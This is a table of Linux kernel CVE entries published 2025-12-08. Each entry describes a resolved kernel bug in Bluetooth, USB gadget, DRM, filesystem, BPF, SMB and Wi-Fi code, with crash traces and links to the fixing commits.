| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: bcsp: receive data only if registered Currently, bcsp_recv() can be called even when the BCSP protocol has not been registered. This leads to a NULL pointer dereference, as shown in the following stack trace: KASAN: null-ptr-deref in range [0x0000000000000108-0x000000000000010f] RIP: 0010:bcsp_recv+0x13d/0x1740 drivers/bluetooth/hci_bcsp.c:590 Call Trace: <TASK> hci_uart_tty_receive+0x194/0x220 drivers/bluetooth/hci_ldisc.c:627 tiocsti+0x23c/0x2c0 drivers/tty/tty_io.c:2290 tty_ioctl+0x626/0xde0 drivers/tty/tty_io.c:2706 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:907 [inline] __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:893 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f To prevent this, ensure that the HCI_UART_REGISTERED flag is set before processing received data. If the protocol is not registered, return -EUNATCH. | 2025-12-08 | not yet calculated | CVE-2025-40308 | https://git.kernel.org/stable/c/39a7d40314b6288cfa2d13269275e9247a7a055a https://git.kernel.org/stable/c/164586725b47f9d61912e6bf17dbaffeff11710b https://git.kernel.org/stable/c/b65ca9708bfbf47d8b7bd44b7c574bd16798e9c9 https://git.kernel.org/stable/c/8b892dbef3887dbe9afdc7176d1a5fd90e1636aa https://git.kernel.org/stable/c/799cd62cbcc3f12ee04b33ef390ff7d41c37d671 https://git.kernel.org/stable/c/b420a4c7f915fc1c94ad1f6ca740acc046d94334 https://git.kernel.org/stable/c/55c1519fca830f59a10bbf9aa8209c87b06cf7bc https://git.kernel.org/stable/c/ca94b2b036c22556c3a66f1b80f490882deef7a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SCO: Fix UAF on sco_conn_free BUG: KASAN: slab-use-after-free in sco_conn_free net/bluetooth/sco.c:87 [inline] BUG: KASAN: slab-use-after-free in kref_put include/linux/kref.h:65 [inline] BUG: KASAN: slab-use-after-free in sco_conn_put+0xdd/0x410 net/bluetooth/sco.c:107 Write of size 8 at addr ffff88811cb96b50 by task kworker/u17:4/352 CPU: 1 UID: 0 PID: 352 Comm: kworker/u17:4 Not tainted 6.17.0-rc5-g717368f83676 #4 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 Workqueue: hci13 hci_cmd_sync_work Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x10b/0x170 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0x191/0x550 mm/kasan/report.c:482 kasan_report+0xc4/0x100 mm/kasan/report.c:595 sco_conn_free net/bluetooth/sco.c:87 [inline] kref_put include/linux/kref.h:65 [inline] sco_conn_put+0xdd/0x410 net/bluetooth/sco.c:107 sco_connect_cfm+0xb4/0xae0 net/bluetooth/sco.c:1441 hci_connect_cfm include/net/bluetooth/hci_core.h:2082 [inline] hci_conn_failed+0x20a/0x2e0 net/bluetooth/hci_conn.c:1313 hci_conn_unlink+0x55f/0x810 net/bluetooth/hci_conn.c:1121 hci_conn_del+0xb6/0x1110 net/bluetooth/hci_conn.c:1147 hci_abort_conn_sync+0x8c5/0xbb0 net/bluetooth/hci_sync.c:5689 hci_cmd_sync_work+0x281/0x380 net/bluetooth/hci_sync.c:332 process_one_work kernel/workqueue.c:3236 [inline] process_scheduled_works+0x77e/0x1040 kernel/workqueue.c:3319 worker_thread+0xbee/0x1200 kernel/workqueue.c:3400 kthread+0x3c7/0x870 kernel/kthread.c:463 ret_from_fork+0x13a/0x1e0 arch/x86/kernel/process.c:148 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 </TASK> Allocated by task 31370: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x30/0x70 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:388 [inline] __kasan_kmalloc+0x82/0x90 mm/kasan/common.c:405 kasan_kmalloc include/linux/kasan.h:260 [inline] __do_kmalloc_node mm/slub.c:4382 [inline] __kmalloc_noprof+0x22f/0x390 mm/slub.c:4394 kmalloc_noprof include/linux/slab.h:909 [inline] sk_prot_alloc+0xae/0x220 net/core/sock.c:2239 sk_alloc+0x34/0x5a0 net/core/sock.c:2295 bt_sock_alloc+0x3c/0x330 net/bluetooth/af_bluetooth.c:151 sco_sock_alloc net/bluetooth/sco.c:562 [inline] sco_sock_create+0xc0/0x350 net/bluetooth/sco.c:593 bt_sock_create+0x161/0x3b0 net/bluetooth/af_bluetooth.c:135 __sock_create+0x3ad/0x780 net/socket.c:1589 sock_create net/socket.c:1647 [inline] __sys_socket_create net/socket.c:1684 [inline] __sys_socket+0xd5/0x330 net/socket.c:1731 __do_sys_socket net/socket.c:1745 [inline] __se_sys_socket net/socket.c:1743 [inline] __x64_sys_socket+0x7a/0x90 net/socket.c:1743 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xc7/0x240 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 31374: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x30/0x70 mm/kasan/common.c:68 kasan_save_free_info+0x40/0x50 mm/kasan/generic.c:576 poison_slab_object mm/kasan/common.c:243 [inline] __kasan_slab_free+0x3d/0x50 mm/kasan/common.c:275 kasan_slab_free include/linux/kasan.h:233 [inline] slab_free_hook mm/slub.c:2428 [inline] slab_free mm/slub.c:4701 [inline] kfree+0x199/0x3b0 mm/slub.c:4900 sk_prot_free net/core/sock.c:2278 [inline] __sk_destruct+0x4aa/0x630 net/core/sock.c:2373 sco_sock_release+0x2ad/0x300 net/bluetooth/sco.c:1333 __sock_release net/socket.c:649 [inline] sock_close+0xb8/0x230 net/socket.c:1439 __fput+0x3d1/0x9e0 fs/file_table.c:468 task_work_run+0x206/0x2a0 kernel/task_work.c:227 get_signal+0x1201/0x1410 kernel/signal.c:2807 arch_do_signal_or_restart+0x34/0x740 arch/x86/kernel/signal.c:337 exit_to_user_mode_loop+0x68/0xc0 kernel/entry/common.c:40 exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline] s ---truncated--- | 2025-12-08 | not yet calculated | CVE-2025-40309 | https://git.kernel.org/stable/c/57707135755bd78b1fe5acaebb054fba4739e14c https://git.kernel.org/stable/c/c17caff1062ca91ebac44bfd01d2fb3d99dc0e23 https://git.kernel.org/stable/c/d2850f037c2ae75882d68ae654d546ff5c0f678c https://git.kernel.org/stable/c/c419674cc74309ffaabc591e7200efb49a18fccd https://git.kernel.org/stable/c/03371c0218189b185595b65a04dad60076ca9718 https://git.kernel.org/stable/c/ed10dddc7df2daaf2a4d98a972aac5183e738cc0 https://git.kernel.org/stable/c/391f83547b7b2c63e4b572ab838e10a06cfa4425 https://git.kernel.org/stable/c/ecb9a843be4d6fd710d7026e359f21015a062572 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: amd/amdkfd: resolve a race in amdgpu_amdkfd_device_fini_sw There is a race between amdgpu_amdkfd_device_fini_sw and interrupt handling: if amdgpu_amdkfd_device_fini_sw runs between kfd_cleanup_nodes and kfree(kfd) and a KGD interrupt is generated, the kernel panics. kernel panic log: BUG: kernel NULL pointer dereference, address: 0000000000000098 amdgpu 0000:c8:00.0: amdgpu: Requesting 4 partitions through PSP PGD d78c68067 P4D d78c68067 kfd kfd: amdgpu: Allocated 3969056 bytes on gart PUD 1465b8067 PMD @ Oops: @002 [#1] SMP NOPTI kfd kfd: amdgpu: Total number of KFD nodes to be created: 4 CPU: 115 PID: @ Comm: swapper/115 Kdump: loaded Tainted: G S W OE K RIP: 0010:_raw_spin_lock_irqsave+0x12/0x40 Code: 89 e@ 41 5c c3 cc cc cc cc 66 66 2e Of 1f 84 00 00 00 00 00 OF 1f 40 00 Of 1f 44% 00 00 41 54 9c 41 5c fa 31 cO ba 01 00 00 00 <fO> OF b1 17 75 Ba 4c 89 e@ 41 Sc 89 c6 e8 07 38 5d RSP: 0018: ffffc90@1a6b0e28 EFLAGS: 00010046 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000018 0000000000000001 RSI: ffff8883bb623e00 RDI: 0000000000000098 ffff8883bb000000 RO8: ffff888100055020 ROO: ffff888100055020 0000000000000000 R11: 0000000000000000 R12: 0900000000000002 ffff888F2b97da0@ R14: @000000000000098 R15: ffff8883babdfo00 CS: 010 DS: 0000 ES: 0000 CRO: 0000000080050033 CR2: 0000000000000098 CR3: 0000000e7cae2006 CR4: 0000000002770ce0 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 0000000000000000 DR6: 00000000fffeO7FO DR7: 0000000000000400 PKRU: 55555554 Call Trace: <IRQ> kgd2kfd_interrupt+@x6b/0x1f@ [amdgpu] ? amdgpu_fence_process+0xa4/0x150 [amdgpu] kfd kfd: amdgpu: Node: 0, interrupt_bitmap: 3 YcpxFl Rant tErace amdgpu_irq_dispatch+0x165/0x210 [amdgpu] amdgpu_ih_process+0x80/0x100 [amdgpu] amdgpu: Virtual CRAT table created for GPU amdgpu_irq_handler+0x1f/@x60 [amdgpu] __handle_irq_event_percpu+0x3d/0x170 amdgpu: Topology: Add dGPU node [0x74a2:0x1002] handle_irq_event+0x5a/@xcO handle_edge_irq+0x93/0x240 kfd kfd: amdgpu: KFD node 1 partition @ size 49148M asm_call_irq_on_stack+0xf/@x20 </IRQ> common_interrupt+0xb3/0x130 asm_common_interrupt+0x1le/0x40 5.10.134-010.a1i5000.a18.x86_64 #1 | 2025-12-08 | not yet calculated | CVE-2025-40310 | https://git.kernel.org/stable/c/93f8d67ef8b50334a26129df4da5a4cb60ad4090 https://git.kernel.org/stable/c/bc9e789053abe463f8cf74eee5fc2f157c11a79f https://git.kernel.org/stable/c/2f89a2d15550b653caaeeab7ab68c4d7583fd4fe https://git.kernel.org/stable/c/99d7181bca34e96fbf61bdb6844918bdd4df2814 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/habanalabs: support mapping cb with vmalloc-backed coherent memory When IOMMU is enabled, dma_alloc_coherent() with GFP_USER may return addresses from the vmalloc range. If such an address is mapped without VM_MIXEDMAP, vm_insert_page() will trigger a BUG_ON due to the VM_PFNMAP restriction. Fix this by checking for vmalloc addresses and setting VM_MIXEDMAP in the VMA before mapping. This ensures safe mapping and avoids kernel crashes. The memory is still driver-allocated and cannot be accessed directly by userspace. | 2025-12-08 | not yet calculated | CVE-2025-40311 | https://git.kernel.org/stable/c/7ec8ac9f73d4a9438c2186768d6de27ace37531e https://git.kernel.org/stable/c/d1dfe21a332d38a6a09658ec29a55940afb5fe36 https://git.kernel.org/stable/c/73c7c2cdb442fc4160d2a2a4bfffbd162af06cb9 https://git.kernel.org/stable/c/513024d5a0e34fd34247043f1876b6138ca52847 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jfs: Verify inode mode when loading from disk The inode mode loaded from corrupted disk can be invalid. Do like what commit 0a9e74051313 ("isofs: Verify inode mode when loading from disk") does. | 2025-12-08 | not yet calculated | CVE-2025-40312 | https://git.kernel.org/stable/c/19cce65709a8a2966203653028d9004e28e85bd5 https://git.kernel.org/stable/c/fabc1348bb8fe6bc80850014ee94bd89945f7f4d https://git.kernel.org/stable/c/46c76cfa17d1828c1a889cb54cb11d5ef3dfbc0f https://git.kernel.org/stable/c/2870a7dec49ccdc3f6ae35da8f5d6737f21133a8 https://git.kernel.org/stable/c/ce054a366c54992185c9514e489a14f145b10c29 https://git.kernel.org/stable/c/1795277a4e98d82e6451544d43695540cee042ea https://git.kernel.org/stable/c/8d6a9cbd276b3b85da0e7e98208f89416fed9265 https://git.kernel.org/stable/c/7a5aa54fba2bd591b22b9b624e6baa9037276986 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: pretend $Extend records as regular files Since commit af153bb63a33 ("vfs: catch invalid modes in may_open()") requires any inode be one of S_IFDIR/S_IFLNK/S_IFREG/S_IFCHR/S_IFBLK/ S_IFIFO/S_IFSOCK type, use S_IFREG for $Extend records. | 2025-12-08 | not yet calculated | CVE-2025-40313 | https://git.kernel.org/stable/c/63eb6730ce0604d3eacf036c2f68ea70b068317c https://git.kernel.org/stable/c/78d46f5276ed3589aaaa435580068c5b62efc921 https://git.kernel.org/stable/c/17249b2a65274f73ed68bcd1604e08a60fd8a278 https://git.kernel.org/stable/c/37f65e68ba9852dc51c78dbb54a9881c3f0fe4f7 https://git.kernel.org/stable/c/57534db1bbc4ca772393bb7d92e69d5e7b9051cf https://git.kernel.org/stable/c/4e8011ffec79717e5fdac43a7e79faf811a384b7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: cdns3: gadget: Use-after-free during failed initialization and exit of cdnsp gadget In the __cdnsp_gadget_init() and cdnsp_gadget_exit() functions, the gadget structure (pdev->gadget) was freed before its endpoints. The endpoints are linked via the ep_list in the gadget structure. Freeing the gadget first leaves dangling pointers in the endpoint list. When the endpoints are subsequently freed, this results in a use-after-free. Fix: By separating the usb_del_gadget_udc() operation into distinct "del" and "put" steps, cdnsp_gadget_free_endpoints() can be executed prior to the final release of the gadget structure with usb_put_gadget(). A patch similar to bb9c74a5bd14 ("usb: dwc3: gadget: Free gadget structure only after freeing endpoints"). | 2025-12-08 | not yet calculated | CVE-2025-40314 | https://git.kernel.org/stable/c/0cf9a50af91fbdac3849f8d950e883a3eaa3ecea https://git.kernel.org/stable/c/37158ce6ba964b62d1e3eebd11f03c6900a52dd1 https://git.kernel.org/stable/c/ea37884097a0931abb8e11e40eacfb25e9fdb5e9 https://git.kernel.org/stable/c/9c52f01429c377a2d32cafc977465f37b5384f77 https://git.kernel.org/stable/c/fdf573c517627a96f5040f988e9b21267806be5c https://git.kernel.org/stable/c/87c5ff5615dc0a37167e8faf3adeeddc6f1344a3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_fs: Fix epfile null pointer access after ep enable. A race condition occurs when ffs_func_eps_enable() runs concurrently with ffs_data_reset(). The ffs_data_clear() called in ffs_data_reset() sets ffs->epfiles to NULL before resetting ffs->eps_count to 0, leading to a NULL pointer dereference when accessing epfile->ep in ffs_func_eps_enable() after successful usb_ep_enable(). The ffs->epfiles pointer is set to NULL in both ffs_data_clear() and ffs_data_close() functions, and its modification is protected by the spinlock ffs->eps_lock. And the whole ffs_func_eps_enable() function is also protected by ffs->eps_lock. Thus, add NULL pointer handling for ffs->epfiles in the ffs_func_eps_enable() function to fix the issue. | 2025-12-08 | not yet calculated | CVE-2025-40315 | https://git.kernel.org/stable/c/b00d2572c16e8e59e979960d3383c2ae9cebd195 https://git.kernel.org/stable/c/1c0dbd240be3f87cac321b14e17979b7e9cb6a8f https://git.kernel.org/stable/c/9ec40fba7357df2d36f4c2e2f3b9b1a4fba0a272 https://git.kernel.org/stable/c/c53e90563bc148e4e0ad09fe130ba2246d426ea6 https://git.kernel.org/stable/c/fc1141a530dfc91f0ee19b7f422a2d24829584bc https://git.kernel.org/stable/c/d62b808d5c68a931ad0849a00a5e3be3dd7e0019 https://git.kernel.org/stable/c/30880e9df27332403dd638a82c27921134b3630b https://git.kernel.org/stable/c/cfd6f1a7b42f62523c96d9703ef32b0dbc495ba4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/mediatek: Fix device use-after-free on unbind A recent change fixed device reference leaks when looking up drm platform device driver data during bind() but failed to remove a partial fix which had been added by commit 80805b62ea5b ("drm/mediatek: Fix kobject put for component sub-drivers"). This results in a reference imbalance on component bind() failures and on unbind() which could lead to a use-after-free. Make sure to only drop the references after retrieving the driver data by effectively reverting the previous partial fix. Note that holding a reference to a device does not prevent its driver data from going away so there is no point in keeping the reference. | 2025-12-08 | not yet calculated | CVE-2025-40316 | https://git.kernel.org/stable/c/a5a896f8315de358a2932e2c23c42d550256046a https://git.kernel.org/stable/c/0142fe895986addf35885b43440718e567121155 https://git.kernel.org/stable/c/8ba827e09eb586e952d10e39406fa02d10bb591e https://git.kernel.org/stable/c/926d002e6d7e2f1fd5c1b53cf6208153ee7d380d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regmap: slimbus: fix bus_context pointer in regmap init calls Commit 4e65bda8273c ("ASoC: wcd934x: fix error handling in wcd934x_codec_parse_data()") revealed the problem in the slimbus regmap. That commit breaks audio playback, for instance, on sdm845 Thundercomm Dragonboard 845c board: Unable to handle kernel paging request at virtual address ffff8000847cbad4 ... CPU: 5 UID: 0 PID: 776 Comm: aplay Not tainted 6.18.0-rc1-00028-g7ea30958b305 #11 PREEMPT Hardware name: Thundercomm Dragonboard 845c (DT) ... Call trace: slim_xfer_msg+0x24/0x1ac [slimbus] (P) slim_read+0x48/0x74 [slimbus] regmap_slimbus_read+0x18/0x24 [regmap_slimbus] _regmap_raw_read+0xe8/0x174 _regmap_bus_read+0x44/0x80 _regmap_read+0x60/0xd8 _regmap_update_bits+0xf4/0x140 _regmap_select_page+0xa8/0x124 _regmap_raw_write_impl+0x3b8/0x65c _regmap_bus_raw_write+0x60/0x80 _regmap_write+0x58/0xc0 regmap_write+0x4c/0x80 wcd934x_hw_params+0x494/0x8b8 [snd_soc_wcd934x] snd_soc_dai_hw_params+0x3c/0x7c [snd_soc_core] __soc_pcm_hw_params+0x22c/0x634 [snd_soc_core] dpcm_be_dai_hw_params+0x1d4/0x38c [snd_soc_core] dpcm_fe_dai_hw_params+0x9c/0x17c [snd_soc_core] snd_pcm_hw_params+0x124/0x464 [snd_pcm] snd_pcm_common_ioctl+0x110c/0x1820 [snd_pcm] snd_pcm_ioctl+0x34/0x4c [snd_pcm] __arm64_sys_ioctl+0xac/0x104 invoke_syscall+0x48/0x104 el0_svc_common.constprop.0+0x40/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x34/0xec el0t_64_sync_handler+0xa0/0xf0 el0t_64_sync+0x198/0x19c The __devm_regmap_init_slimbus() started to be used instead of __regmap_init_slimbus() after the commit mentioned above and turns out the incorrect bus_context pointer (3rd argument) was used in __devm_regmap_init_slimbus(). It should be just "slimbus" (which is equal to &slimbus->dev). Correct it. The wcd934x codec seems to be the only or the first user of devm_regmap_init_slimbus() but we should fix it till the point where __devm_regmap_init_slimbus() was introduced therefore two "Fixes" tags. While at this, also correct the same argument in __regmap_init_slimbus(). | 2025-12-08 | not yet calculated | CVE-2025-40317 | https://git.kernel.org/stable/c/c0f05129e5734ff3fd14b2c242709314d9ca5433 https://git.kernel.org/stable/c/02d3041caaa3fe4dd69e5a8afd1ac6b918ddc6a1 https://git.kernel.org/stable/c/d979639f099c6e51f06ce4dd8d8e56364d6c17ba https://git.kernel.org/stable/c/8143e4075d131c528540417a51966f6697be14eb https://git.kernel.org/stable/c/2664bfd8969d1c43dcbe3ea313f130dfa6b74f4c https://git.kernel.org/stable/c/a16e92f8d7dc7371e68f17a9926cb92d2244be7b https://git.kernel.org/stable/c/b65f3303349eaee333e47d2a99045aa12fa0c3a7 https://git.kernel.org/stable/c/434f7349a1f00618a620b316f091bd13a12bc8d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: fix race in hci_cmd_sync_dequeue_once hci_cmd_sync_dequeue_once() does lookup and then cancel the entry under two separate lock sections. Meanwhile, hci_cmd_sync_work() can also delete the same entry, leading to double list_del() and "UAF". Fix this by holding cmd_sync_work_lock across both lookup and cancel, so that the entry cannot be removed concurrently. | 2025-12-08 | not yet calculated | CVE-2025-40318 | https://git.kernel.org/stable/c/0a94f7e017438935c09ef833a1aa908ad9875213 https://git.kernel.org/stable/c/932c0a4f77ac13e526fdd5b42914d29c9821d389 https://git.kernel.org/stable/c/ae76cf6c2c842944c6514c57df54d728f1916553 https://git.kernel.org/stable/c/9cd536970192b72257afcdfba0bfc09993e6f19c https://git.kernel.org/stable/c/09b0cd1297b4dbfe736aeaa0ceeab2265f47f772 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Sync pending IRQ work before freeing ring buffer Fix a race where irq_work can be queued in bpf_ringbuf_commit() but the ring buffer is freed before the work executes. In the syzbot reproducer, a BPF program attached to sched_switch triggers bpf_ringbuf_commit(), queuing an irq_work. If the ring buffer is freed before this work executes, the irq_work thread may access freed memory. Calling `irq_work_sync(&rb->work)` ensures that all pending irq_work complete before freeing the buffer. | 2025-12-08 | not yet calculated | CVE-2025-40319 | https://git.kernel.org/stable/c/47626748a2a00068dbbd5836d19076637b4e235b https://git.kernel.org/stable/c/de2ce6b14bc3e565708a39bdba3ef9162aeffc72 https://git.kernel.org/stable/c/e1828c7a8d8135e21ff6adaaa9458c32aae13b11 https://git.kernel.org/stable/c/6451141103547f4efd774e912418a3b4318046c6 https://git.kernel.org/stable/c/10ca3b2eec384628bc9f5d8190aed9427ad2dde6 https://git.kernel.org/stable/c/430e15544f11f8de26b2b5109c7152f71b78295e https://git.kernel.org/stable/c/4e9077638301816a7d73fa1e1b4c1db4a7e3b59c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential cfid UAF in smb2_query_info_compound When smb2_query_info_compound() retries, a previously allocated cfid may have been freed in the first attempt. Because cfid wasn't reset on replay, later cleanup could act on a stale pointer, leading to a potential use-after-free. Reinitialize cfid to NULL under the replay label. Example trace (trimmed): refcount_t: underflow; use-after-free. WARNING: CPU: 1 PID: 11224 at ../lib/refcount.c:28 refcount_warn_saturate+0x9c/0x110 [...] RIP: 0010:refcount_warn_saturate+0x9c/0x110 [...] Call Trace: <TASK> smb2_query_info_compound+0x29c/0x5c0 [cifs f90b72658819bd21c94769b6a652029a07a7172f] ? step_into+0x10d/0x690 ? __legitimize_path+0x28/0x60 smb2_queryfs+0x6a/0xf0 [cifs f90b72658819bd21c94769b6a652029a07a7172f] smb311_queryfs+0x12d/0x140 [cifs f90b72658819bd21c94769b6a652029a07a7172f] ? kmem_cache_alloc+0x18a/0x340 ? getname_flags+0x46/0x1e0 cifs_statfs+0x9f/0x2b0 [cifs f90b72658819bd21c94769b6a652029a07a7172f] statfs_by_dentry+0x67/0x90 vfs_statfs+0x16/0xd0 user_statfs+0x54/0xa0 __do_sys_statfs+0x20/0x50 do_syscall_64+0x58/0x80 | 2025-12-08 | not yet calculated | CVE-2025-40320 | https://git.kernel.org/stable/c/939c4e33005e2a56ea8fcedddf0da92df864bd3b https://git.kernel.org/stable/c/327f89c21601ebb7889f8c97754b76f08ce95a0c https://git.kernel.org/stable/c/b556c278d43f4707a9073ca74d55581b4f279806 https://git.kernel.org/stable/c/5c76f9961c170552c1d07c830b5e145475151600 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: fix crash while sending Action Frames in standalone AP Mode Currently, whenever there is a need to transmit an Action frame, the brcmfmac driver always uses the P2P vif to send the "actframe" IOVAR to firmware. The P2P interfaces were available when wpa_supplicant is managing the wlan interface. However, the P2P interfaces are not created/initialized when only hostapd is managing the wlan interface. And if hostapd receives an ANQP Query REQ Action frame even from an un-associated STA, the brcmfmac driver tries to use an uninitialized P2P vif pointer for sending the IOVAR to firmware. This NULL pointer dereferencing triggers a driver crash. [ 1417.074538] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 [...] [ 1417.075188] Hardware name: Raspberry Pi 4 Model B Rev 1.5 (DT) [...] [ 1417.075653] Call trace: [ 1417.075662] brcmf_p2p_send_action_frame+0x23c/0xc58 [brcmfmac] [ 1417.075738] brcmf_cfg80211_mgmt_tx+0x304/0x5c0 [brcmfmac] [ 1417.075810] cfg80211_mlme_mgmt_tx+0x1b0/0x428 [cfg80211] [ 1417.076067] nl80211_tx_mgmt+0x238/0x388 [cfg80211] [ 1417.076281] genl_family_rcv_msg_doit+0xe0/0x158 [ 1417.076302] genl_rcv_msg+0x220/0x2a0 [ 1417.076317] netlink_rcv_skb+0x68/0x140 [ 1417.076330] genl_rcv+0x40/0x60 [ 1417.076343] netlink_unicast+0x330/0x3b8 [ 1417.076357] netlink_sendmsg+0x19c/0x3f8 [ 1417.076370] __sock_sendmsg+0x64/0xc0 [ 1417.076391] ____sys_sendmsg+0x268/0x2a0 [ 1417.076408] ___sys_sendmsg+0xb8/0x118 [ 1417.076427] __sys_sendmsg+0x90/0xf8 [ 1417.076445] __arm64_sys_sendmsg+0x2c/0x40 [ 1417.076465] invoke_syscall+0x50/0x120 [ 1417.076486] el0_svc_common.constprop.0+0x48/0xf0 [ 1417.076506] do_el0_svc+0x24/0x38 [ 1417.076525] el0_svc+0x30/0x100 [ 1417.076548] el0t_64_sync_handler+0x100/0x130 [ 1417.076569] el0t_64_sync+0x190/0x198 [ 1417.076589] Code: f9401e80 aa1603e2 f9403be1 5280e483 (f9400000) Fix this, by always using the vif corresponding to the wdev on which the Action frame Transmission request was initiated by the userspace. This way, even if P2P vif is not available, the IOVAR is sent to firmware on AP vif and the ANQP Query RESP Action frame is transmitted without crashing the driver. Move init_completion() for "send_af_done" from brcmf_p2p_create_p2pdev() to brcmf_p2p_attach(). Because the former function would not get executed when only hostapd is managing wlan interface, and it is not safe to do reinit_completion() later in brcmf_p2p_tx_action_frame(), without any prior init_completion(). And in the brcmf_p2p_tx_action_frame() function, the condition check for P2P Presence response frame is not needed, since the wpa_supplicant is properly sending the P2P Presence Response frame on the P2P-GO vif instead of the P2P-Device vif. [Cc stable] | 2025-12-08 | not yet calculated | CVE-2025-40321 | https://git.kernel.org/stable/c/c863b9c7b4e9af0b7931cb791ec91971a50f1a25 https://git.kernel.org/stable/c/e1fc9afcce9139791260f962541282d47fbb508d https://git.kernel.org/stable/c/55f60a72a178909ece4e32987e4c642ba57e1cf4 https://git.kernel.org/stable/c/c2b0f8d3e7358c33d90f0e62765d474f25f26a45 https://git.kernel.org/stable/c/64e3175d1c8a3bea02032e7c9d1befd5f43786fa https://git.kernel.org/stable/c/a6eed58249e7d60f856900e682992300f770f64b https://git.kernel.org/stable/c/dbc7357b6aae686d9404e1dd7e2e6cf92c3a1b5a https://git.kernel.org/stable/c/3776c685ebe5f43e9060af06872661de55e80b9a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: bitblit: bound-check glyph index in bit_putcs* bit_putcs_aligned()/unaligned() derived the glyph pointer from the character value masked by 0xff/0x1ff, which may exceed the actual font's glyph count and read past the end of the built-in font array. Clamp the index to the actual glyph count before computing the address. This fixes a global out-of-bounds read reported by syzbot. | 2025-12-08 | not yet calculated | CVE-2025-40322 | https://git.kernel.org/stable/c/a10cede006f9614b465cf25609a8753efbfd45cc https://git.kernel.org/stable/c/0998a6cb232674408a03e8561dc15aa266b2f53b https://git.kernel.org/stable/c/db5c9a162d2f42bcc842b76b3d935dcc050a0eec https://git.kernel.org/stable/c/c12003bf91fdff381c55ef54fef3e961a5af2545 https://git.kernel.org/stable/c/9ba1a7802ca9a2590cef95b253e6526f4364477f https://git.kernel.org/stable/c/901f44227072be60812fe8083e83e1533c04eed1 https://git.kernel.org/stable/c/efaf89a75a29b2d179bf4fe63ca62852e93ad620 https://git.kernel.org/stable/c/18c4ef4e765a798b47980555ed665d78b71aeadf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbcon: Set fb_display[i]->mode to NULL when the mode is released Recently, we discovered the following issue through syzkaller: BUG: KASAN: slab-use-after-free in fb_mode_is_equal+0x285/0x2f0 Read of size 4 at addr ff11000001b3c69c by task syz.xxx ... Call Trace: <TASK> dump_stack_lvl+0xab/0xe0 print_address_description.constprop.0+0x2c/0x390 print_report+0xb9/0x280 kasan_report+0xb8/0xf0 fb_mode_is_equal+0x285/0x2f0 fbcon_mode_deleted+0x129/0x180 fb_set_var+0xe7f/0x11d0 do_fb_ioctl+0x6a0/0x750 fb_ioctl+0xe0/0x140 __x64_sys_ioctl+0x193/0x210 do_syscall_64+0x5f/0x9c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e Based on experimentation and analysis, during framebuffer unregistration, only the memory of fb_info->modelist is freed, without setting the corresponding fb_display[i]->mode to NULL for the freed modes. This leads to UAF issues during subsequent accesses. Here's an example of reproduction steps: 1. With /dev/fb0 already registered in the system, load a kernel module to register a new device /dev/fb1; 2. Set fb1's mode to the global fb_display[] array (via FBIOPUT_CON2FBMAP); 3. Switch console from fb to VGA (to allow normal rmmod of the ko); 4. Unload the kernel module, at this point fb1's modelist is freed, leaving a wild pointer in fb_display[]; 5. Trigger the bug via system calls through fb0 attempting to delete a mode from fb0. Add a check in do_unregister_framebuffer(): if the mode to be freed exists in fb_display[], set the corresponding mode pointer to NULL. | 2025-12-08 | not yet calculated | CVE-2025-40323 | https://git.kernel.org/stable/c/4ac18f0e6a6d599ca751c4cd98e522afc8e3d4eb https://git.kernel.org/stable/c/468f78276a37f4c6499385a4ce28f4f57be6655d https://git.kernel.org/stable/c/c079d42f70109512eee49123a843be91d8fa133f https://git.kernel.org/stable/c/de89d19f4f30d9a8de87b9d08c1bd35cb70576d8 https://git.kernel.org/stable/c/a1f3058930745d2b938b6b4f5bd9630dc74b26b7 |
